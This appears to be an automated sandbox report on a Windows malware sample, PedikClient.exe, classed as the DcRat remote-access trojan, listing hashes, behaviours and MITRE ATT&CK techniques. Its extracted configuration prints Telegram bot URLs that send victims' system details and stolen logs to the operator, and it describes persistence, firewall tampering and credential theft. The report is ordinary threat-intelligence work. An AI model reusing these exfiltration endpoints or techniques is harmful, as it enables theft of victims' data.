General
-
Target
PedikClient.exe
-
Size
1.7MB
-
Sample
241023-cygelsxakf
-
MD5
28d6347c722e5cac5ae9245b16d4754c
-
SHA1
45a79b7368ec79516ab1772188bec1b36c43d498
-
SHA256
eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1
-
SHA512
643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181
-
SSDEEP
49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15
Static task
static1
Behavioral task
behavioral1
Sample
PedikClient.exe
Resource
win11-20241007-en
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CGoogle%5Cdwm.ex
https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713
Targets
-
-
Target
PedikClient.exe
-
Size
1.7MB
-
MD5
28d6347c722e5cac5ae9245b16d4754c
-
SHA1
45a79b7368ec79516ab1772188bec1b36c43d498
-
SHA256
eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1
-
SHA512
643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181
-
SSDEEP
49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Boot or Logon Autostart Execution: Active Setup
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall
-
Executes dropped EXE
-
Adds Run key to start application
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
7Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1